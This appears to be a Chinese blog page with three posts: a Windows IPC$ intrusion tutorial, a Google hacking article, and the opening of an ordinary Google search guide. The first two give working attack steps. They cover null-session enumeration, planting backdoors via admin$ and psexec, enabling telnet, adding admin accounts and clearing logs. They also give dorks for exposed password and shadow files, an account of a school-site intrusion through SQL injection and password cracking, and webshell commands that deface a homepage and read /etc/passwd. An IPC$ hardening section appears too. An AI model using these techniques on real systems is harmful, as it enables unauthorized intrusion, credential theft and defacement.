3 查看远程主机的当前时间 命令: net time \\ip 解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT) 命令:nbtstat -A ip 用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H <1C> GROUP Registered SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered INet~Services <1C> GROUP Registered IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在 Event Log中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?
五 ipc$所使用的端口 首先我们来了解一些基础知识: 1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务; 2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NET BIOS网络互联。 3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT 实现,还可以直接通过445端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:
对于win2000客户端(发起端)来说: 1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就 发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都 没有响应,则会话失败; 2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失 败。
对于win2000服务器端来说: 1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING); 2 如果禁止NBT,那么只有445端口开放。
我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ip c$会话是无法建立的。
六 ipc管道在hack攻击中的意义 ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得 手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成 败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重 要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当 然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我 们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。
七 ipc$连接失败的常见原因 以下是一些常见的导致ipc$连接失败的原因:
1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能 在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ip c$连接的;
2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ip c$共享,将不能建立连接;
3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它 发起方无法发起连接请求;
4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共 享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接;
5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);
6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;
7 连接发起方未打开139,445端口;
8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样的错误提示(显然空会话 排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空, 可以直接输入两个引号""即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的; 错误号51,Windows无法找到网络路径:网络有问题; 错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口 过滤); 错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连; 错误号1326,未知的用户名或错误密码:原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动; 错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
八 复制文件失败的原因 有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败 的常见原因又有哪些呢?
1 对方未开启共享文件夹 这类错误出现的最多,占到50%以上。许多朋友在ipc$连接建立成功后,甚至都不知道对方是否有共享文件夹, 就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命 令看一下你想要复制的共享文件夹是否存在(用软件查看当然更好),不要认为能建立ipc$连接就一定有共享文 件夹存在。
2 向默认共享复制失败 这类错误也是大家经常犯的,主要有两个小方面:
1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向c$,d$,admin$之类 的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共 享,并不能说明默认共享一定存在。ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际 的文件夹,而默认共享却是实实在在的共享文件夹;
2)由于net view \\IP 这个命令无法显示默认共享文件夹(因为默认共享带$),因此通过这个命令,我们并不 能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功; (不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)
要点:请大家一定区分ipc共享,默认共享,普通共享这三者的区别:ipc共享是一个管道,并不是实际的共享文件 夹;默认共享是安装时默认打开的文件夹;普通共享是我们自己开启的可以设置权限的共享文件夹。
3用户权限不够,包括四种情形: 1)空连接向所有共享(默认共享和普通共享)复制时,权限是不够的; 2)向默认共享复制时,在Win2000 Pro版中,只有Administrators和Backup Operators组成员才可以,在 Win2000 Server版本 Server Operatros组也可以访问到这些共享目录; 3)向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限); 4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;
注意: 1 不要认为administrator就一定具有管理员权限,管理员名称是可以改的 2 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理员可以对普通的共享文件夹 进行访问权限设置,如图6,管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问, 那么此时即使你拥有管理员权限,你仍然不能访问D盘。不过有意思的是,如果此时对方又开启了D$的默认共 享,那么你却可以访问D$,从而绕过了权限限制,有兴趣的朋友可以自己做测试。
4被防火墙杀死或在局域网 还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;或者你 把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情 况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。
呵呵,大家也知道,ipc$连接在实际操作过程中会出现各种各样的问题,上面我所总结的只是一些常见错误,没 说到的,大家可以给我提个醒儿。
九 关于at命令和xp对ipc$的限制 本来还想说一下用at远程运行程序失败的原因,但考虑到at的成功率不是很高,问题也很多,在这里就不提它了 (提的越多,用的人就越多),而是推荐大家用p***ec.exe远程运行程序,假设想要远程机器执行本地c:\xinxi n.exe文件,且管理员为administrator,密码为1234,那么输入下面的命令: p***ec \\ip -u administrator -p 1234 -c c:\xinxin.exe 如果已经建立ipc连接,则-u -p这两个参数不需要,p***ec.exe将自动拷贝文件到远程机器并运行。
本来xp中的ipc$也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切的提问为什么遇到xp的时 候,大部分操作都很难成功。我在这里就简单提一下吧,在xp的默认安全选项中,任何远程访问仅被赋予来宾权 限,也就是说即使你是用管理员帐户和密码,你所得到的权限也只是Guest,因此大部分操作都会因为权限不够 而失败,而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码,我建议 你尽量避开ipc管道。
十 如何打开目标的IPC$共享以及其他共享 目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马,c md重定向等,然后在shell下执行: net share ipc$ 开放目标的ipc$共享; net share ipc$ /del 关闭目标的ipc$共享;如果你要给它开共享文件夹,你可以用: net share xinxin=c:\ 这样就把它的c盘开为共享名为xinxin共享文件夹了。(可是我发现很多人错误的认为开共享文件夹的命令是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在shell下才能实现的。
十一 一些需要shell才能完成的命令 看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导 作用。那么下面我总结一下需要在shell才能完成的命令:
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;
3 运行/关闭远程主机的服务,需要在shell下完成;
4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill)。
十二 入侵中可能会用到的命令 为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部 分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell (如cmd,telnet等)后,才能向远程主机执行。
1 建立/删除ipc$连接的命令
1)建立空连接: net use \\127.0.0.1\ipc$ "" /user:""
2)建立非空连接: net use \\127.0.0.1\ipc$ "密码" /user:"用户名"
3)删除连接: net use \\127.0.0.1\ipc$ /del
2 在ipc$连接中对远程主机的操作命令
1) 查看远程主机的共享资源(看不到默认共享): net view \\127.0.0.1
2) 查看远程主机的当前时间: net time \\127.0.0.1
3) 得到远程主机的netbios用户名列表: nbtstat -A 127.0.0.1
4)映射/删除远程共享: net use z: \\127.0.0.1\c 此命令将共享名为c的共享资源映射为本地z盘
net use z: /del 删除映射的z盘,其他盘类推
5)向远程主机复制文件: copy 路径\文件名 \\IP\共享目录名,如: copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内 当然,你也可以把远程主机上的文件复制到自己的机器里: copy \\127.0.0.1\c$\xinxin.exe c:\
6)远程添加计划任务: at \\IP 时间 程序名 如: at \\127.0.0.0 11:00 xinxin.exe 注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路 径,否则必须加全路径
3 本地命令
1)查看本地主机的共享资源(可以看到本地的默认共享) net share
2)得到本地主机的用户列表 net user
3)显示本地某用户的帐户信息 net user 帐户名
4)显示本地主机当前启动的服务 net start
5)启动/关闭本地服务 net start 服务名 net stop 服务名
6)在本地添加帐户 net user 帐户名 密码 /add
7)激活禁用的用户 net uesr 帐户名 /active:yes
8)加入管理员组 net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命 令,那么这些本地输入将作用在远程主机上。
4 其他一些命令 1)telnet telnet IP 端口 telnet 127.0.0.0 23
2)用opentelnet.exe开启远程主机的telnet OpenTelnet.exe \\ip 管理员帐号 密码 NTLM的认证方式 port OpenTelnet.exe \\127.0.0.1 administrator "" 1 90 不过这个小工具需要满足四个要求: 1)目标开启了ipc$共享 2)你要拥有管理员密码和帐号 3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证 4)对仅WIN2K/XP有效
3)用p***ec.exe一步获得shell,需要ipc管道支持 p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd p***ec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的ipc$入侵 既然是对比,那么我就先把过去的ipc$入侵步骤写给大家,都是蛮经典的步骤:
[1] C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators \\用扫到的空口令建立连接
[2] c:\>net view \\127.0.0.1 \\查看远程的共享资源
[3] C:\>copy srv.exe \\127.0.0.1\admin$\system32 \\将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启
[4] C:\>net time \\127.0.0.1 \\查看远程主机的当前时间
[5] C:\>at \\127.0.0.1 时间 srv.exe \\用at命令远程运行srv.exe,需要对方开启了'Task Scheduler'服务
[6] C:\>net time \\127.0.0.1 \\再次查看当前时间来估算srv.exe是否已经运行,此步可以省略
[7] C:\>telnet 127.0.0.1 99 \\开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思?那你就把它想象成 远程机器的控制权就好了,操作像DOS),99端口是srv.exe开的一次性后门的端口
[8] C:\WINNT\system32>net start telnet \\我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后门,我们需要一个长久的 后门便于以后访问,如果对方的telnet已经启动,此步可省略
[9] C:\>copy ntlm.exe \\127.0.0.1\admin$\system32 \\在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的
[10] C:\WINNT\system32>ntlm.exe \\在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了 [11] C:\>telnet 127.0.0.1 23 \\在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门
[12] C:\WINNT\system32>net user 帐户名 密码 /add C:\WINNT\system32>net uesr guest /active:yes C:\WINNT\system32>net localgroup administrators 帐户名 /add \\telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等
好了,写到这里我似乎回到了2,3年前,那时的ipc$大家都是这么用的,不过随着新工具的出现,上面提到的一 些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的ipc$入侵吧。
[1] p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd \\用这个工具我们可以一步到位的获得shell
OpenTelnet.exe \\server 管理员帐号 密码 NTLM的认证方式 port \\用它可以方便的更改telnet的验证方式和端口,方便我们登陆
[2] 已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell,克隆就用ca吧,开终端 用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你选了,我就不多说了。
十四 如何防范ipc$入侵察看本地共享资源 运行-cmd-输入net share 删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除)
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把Res trictAnonymous = DWORD的键值改为:1 如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但无法通过这种连接得到列举SAM帐号和共享信息的 权限;在Windows 2000 中增加了"2",未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面 所说的主键不存在,就新建一个再改键值。如果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地 安全设置-本地策略-安全选项-'对匿名连接的额外限制'
2 禁止默认共享
1)察看本地共享资源 运行-cmd-输入net share
2)删除共享(重起后默认共享仍然存在) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务 net stop server /y (重新启动后server服务会重新开启)
4)禁止自动打开默认共享(此操作并不能关闭ipc$共享) 运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServ er\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ Parameters]把AutoShareWks(DWORD)的键值改为:00000000。 这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效。
3 关闭ipc$和默认共享依赖的服务:server服务 如果你真的想关闭ipc$共享,那就禁止server服务吧: 控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用,这时可能会有提示说:XXX 服务也会关闭是否继续,因为还有些次要的服务要依赖于server服务,不要管它。
4 屏蔽139,445端口 由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。
1)139端口可以通过禁止NBT来屏蔽 本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项
2)445端口可以通过修改注册表来屏蔽 添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\Controlset\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 修改完后重启机器 注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。
3)安装防火墙进行端口过滤
6 设置复杂密码,防止通过ipc$穷举出密码,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全 的多。
十五 ipc$入侵问答精选 1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?
答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。
2.你看下面的情况是为什么,可以连接但不能复制 net use \\***.***.***.***\ipc$ "密码" /user:"用户名" 命令成功 copy icmd.exe \\***.***.***.***\admin$ 找不到网络路径 命令不成功
答:像“找不到网络路径”“找不到网络名”之类的问题,大多是因为你想要复制到的共享文件夹没有开启,所以 在复制的时候会出现错误,你可以试着找找其他的共享文件夹。
3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连接没有太多的权限,但没 别的办法了吗?
答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。
4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \\ip发现它没开默认共享,我该怎么办?
答:首先纠正你的一个错误,用net view \\ip是无法看到默认共享的,你可以试着将文件复制到c$,d$看看, 如果都不行,说明他关闭了默认共享,那你就用opentelnet.exe或p***ec.exe吧,用法上面有。
5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事? net uset ccbirds /add
答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell (比如telnet)之后,你才能在远程机器建立一个帐户,否则你的操作只是在本地进行。
6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示 “拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?
答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种可能,如果你想向普通共享 文件夹复制文件却返回这个错误,说明这个文件夹设置的允许访问用户中不包括你(哪怕你是管理员),这一点我 在上一期文章中分析了。
7.我用Win98能与对方建立ipc$连接吗?
答:理论上不可以,要进行ipc$的操作,建议用win2000,用其他操作系统会带来许多不必要的麻烦。
8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这 是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所 说的情况;还有可能是你自己的NBT没有打开,netstat命令是建立在NBT之上的。
9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?
答:呵呵,这说明你已经与目标主机建立了ipc$连接,两个主机间同时建立两个ipc$连接是不允许的。
10.我在映射的时候出现: F:\>net use h: \\211.161.134.*\e$ 系统发生 85 错误。 本地设备名已在使用中。这是怎么回事?
答:你也太粗心了吧,这说明你有一个h盘了,映射到没有的盘符吧!
11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了,但当我映射时出现了错 误,向我要密码,怎么回事? F:\>net use h: \\*.*.*.*\c$ 密码在 \\*.*.*.*\c$ 无效。 请键入 \\*.*.*.*\c$ 的密码: 系统发生 5 错误。 拒绝访问。
答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想办法提升权限或者找管理 员的弱口令吧!默认共享一般是需要管理员权限的。
12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?
答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不 一定能空连接,因为对方可以关闭ipc$共享.
13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能 复制东西,说错误5。请问为什么?
答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾 权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。
14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,可是 net use i: \\1
|
posted @
2007-01-01 17:08 MEYE 阅读(2372) |
评论 (0) |
编辑 收藏
用Google你可瞬间从菜鸟成为黑客
|
|
|
|
|
google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用 途。google hacking其实并非如此简单... google hacking的简单实现
使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的),下面 就来介绍一些常用的语法。
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件,例如在google里输入:intext:动网,将返回所 有在网页正文部分包含"动网"的网页。
allintext:
使用方法和intext类似.
intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符,例如搜索:intitle:安全天使,将返回 所有网页标题中包含“安全天使”的网页。同理allintitle也同intitle类似。
cache:
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦。
define:
搜索某个词语的定义。搜索:define:hacker,将返回关于hacker的定义。
filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的搜索指定类型的文件。例如输入:iletype: doc,将返回所有以doc结尾的文件URL。当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰 富。
info:
查找指定站点的一些基本信息。
inurl:
搜索我们指定的字符是否存在于URL中。例如输入:inurl:admin,将返回N个类似于这样的连接:http:// xxx.com/xxx/admin。用来找管理员登陆的URL不错。allinurl也同inurl类似,可指定多个字符。
link:
例如搜索:inurl:4ngel.net可以返回所有和4ngel.net做了链接的URL。
site:
这个也很有用,例如:site:4ngel.net.将返回所有和4ngel.net这个站有关的URL。
对了还有一些符号也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询
下面开始说说实际应用
以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了。而goo gle正因为其强大的搜索能力往往会把一些敏感信息透露给他们。用google搜索以下内容:
intitle:"index of" etc intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd "# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么 危害是很大的。同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露 漏洞,可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurlutlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面。phpmyadmin是一套功能强大的数据库操作软件,一些站点由于配置失误,导致 我们可以不使用密码直接对phpmyadmin进行操作,我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
还记http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir吗?用google找找,你也许还可 以找到很多古董级的机器。 同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:winnt system32
前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access 的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data filetype:mdb inurl:database filetype:inc conn inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况,和上面的 原理一样,我们还可以用google来找后台。
利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中,找到几个该校的几个系院的域名:
http://a1.xxxx.com http://a2.xxxx.com http://a3.xxxx.com http://a4.xxxx.com
顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没。
site:xxxx.com filetype:doc
得到N个不错的doc。
先找找网站的管理后台地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超过获得2个管理后台地址:
http://a2.xxxx.com/sys/admin_login.asp http://a3.xxxx.com:88/_admin/login_in.asp
还算不错,看看服务器上跑的是什么程序:
site:a2.xxxx.com filetype:asp site:a2.xxxx.com filetype:php site:a2.xxxx.com filetype:aspx site:a3.xxxx.com filetype:asp site:....... ......
a2服务器用的应该是IIS,上面用的是asp的整站程序,还有一个php的论坛a3服务器也是IIS,aspx+asp。w eb程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:
site:a2.xxxx.com intext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞:
site:a2.xxxx.com inurl:file site:a3.xxxx.com inurl:load
在a2上发现一个上传文件的页面:
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,没权限访问。试试注射,
site:a2.xxxx.com filetype:asp
得到N个asp页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,dbowner权限,虽 然不高但已足矣,back a shell不太喜欢,而且看起来数据库的个头就不小,直接把web管理员的密码暴出来再 说,MD5加密过。 一般学校的站点的密码都比较有规律,通常都是域名+ 电话一类的变形,用google搞定吧。
site:xxxx.com //得到N个二级域名 site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的 site:xxxx.com intext:电话 //N个电话
把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1个管理员,还有一 个可能是老师的帐号。登陆上去:
name:网站管理员
pass:a2xxxx7619 //说了吧,就是域名+4个数字要再怎么提权那就不属于本文讨论访问了,呵呵,到此为 止。
这段时间在国外的一些google hack的研究站点看了看,其实也都差不多是一些基本语法的灵活运用,或者 配合某个脚本漏洞,主要还是靠个人的灵活思维。国外对于google hack方面的防范也并不是很多,所以大家还 是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑apache的网管们应该多注意一下这方面,一个intitle: index of就差不多都出来了。
1.查找利用php webshell
intitle:"php shell*" "Enable stderr" filetype:php
(注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果 中,你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNI X,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的PHP SHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的 内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:
echo "召唤" > index.jsp
现在看看首页,已经被我们改成: "召唤" 了。
我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file
echo "test" >> file
这样一条条打出来,站点首页就成功被替换了。同样的也可以
uname -a;cat /etc/passwd
不过有点要注意,有些WEBSHELL程序有问题,执行不了的,
2.搜索INC敏感信息
在google的搜索框中填入:
Code: .org filetype:inc
<--advertisement code begin--><-- -->
|
posted @
2007-01-01 17:02 MEYE 阅读(570) |
评论 (0) |
编辑 收藏
Google搜索从入门到精通v4.0
Google搜索从入门到精通v4.0
donquix 2002.8
1,前言 2,摘要 3,如何使用本文 4,Google简介 5,搜索入门 6,初阶搜索 6.1,搜索结果要求包含两个及两个以上关键字 6.2,搜索结果要求不包含某些特定信息 6.3,搜索结果至少包含多个关键字中的任意一个 7,杂项语法 7.1,通配符问题 7.2,关键字的字母大小写 7.3,搜索整个短语或者句子 7.4,搜索引擎忽略的字符以及强制搜索 8,进阶搜索 8.1,对搜索的网站进行限制 8.2,查询某一类文件 8.3,搜索的关键字包含在URL链接中 8.4,搜索的关键字包含在网页标题中 8.5,搜索的关键字包含在网页“锚”内 9,其他罕用语法 9.1,搜索所有链接到某个URL地址的网页 9.2,查找与某个页面结构内容相似的页面 9.3,从Google服务器上缓存页面中查询信息 10,图片搜索 11,目录检索 12,新闻组搜索 13,Google的其他杰出功能 13.1,网页快照 13.2,集成化的工具条 13.3,单词英文解释 13.4,网页翻译 13.5,单词纠错 13.6,搜索结果过滤 14,Google尚未发布的一些新特性和功能 14.1,对网页更新日期做出限定 14.2,新闻搜索 14.3,分类广告搜索 14.4,其它Google的最新发展动态 14.5,一个有趣的地方 15,后记
——————————————————————————————————
1,前言
我是在2000年上半年知道Google的。在这之前,我搜索英文信息通常用AltaVista,而搜索中文信息则常用Sina。但自使用了 Google之后,它便成为我的Favorite Search engine了。这也得感谢新浪网友曹溪,因为当初正是因为他的大力推介,才使我识得了Google。
记得1996年夏季的时候,当我第一次接触Internet,便被扑面而来的魔力征服了。那种天涯咫尺的感觉,真是妙不可言。在经历了疯狂的WWW冲浪和如痴如醉的BBS沉迷之后,我意识到Internet对我影响至深的还是在于学习方式的变迁。
